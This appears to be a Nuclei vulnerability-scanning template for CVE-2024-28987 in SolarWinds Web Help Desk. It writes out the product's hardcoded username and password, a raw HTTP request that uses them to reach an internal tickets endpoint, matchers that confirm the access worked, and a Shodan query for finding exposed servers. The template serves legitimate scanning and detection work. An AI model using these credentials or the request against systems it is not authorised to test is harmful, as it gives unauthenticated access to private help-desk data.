nuclei-templates/http/cves/2024/CVE-2024-28987.yaml

50 lines
1.6 KiB
YAML

id: CVE-2024-28987
info:
name: SolarWinds Web Help Desk - Hardcoded Credential
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
The SolarWinds Web Help Desk (WHD) software is affected by a hardcoded credential vulnerability, allowing remote unauthenticated user to access internal functionality and modify data.
reference:
- https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2
- https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28987
- https://nvd.nist.gov/vuln/detail/CVE-2024-28987
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-28987
cwe-id: CWE-798
epss-score: 0.00091
epss-percentile: 0.39649
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:1895809524
tags: cve,cve2024,exposure,solarwinds,help-desk
variables:
username: "helpdeskIntegrationUser"
password: "dev-C4F8025E7"
http:
- raw:
- |
GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username+':'+password)}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
part: body
words:
- displayClient
- shortDetail
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502201fd32ed77338e4aa134552c16d825d9de0a4c83ff103e4e66e5257fca051fd37022100c3b15244b49ca0a9559bb511d6be65d29c10cd6b0efbb9f0a29350c7ce43fc82:922c64590222798bb761d5b6d8e72950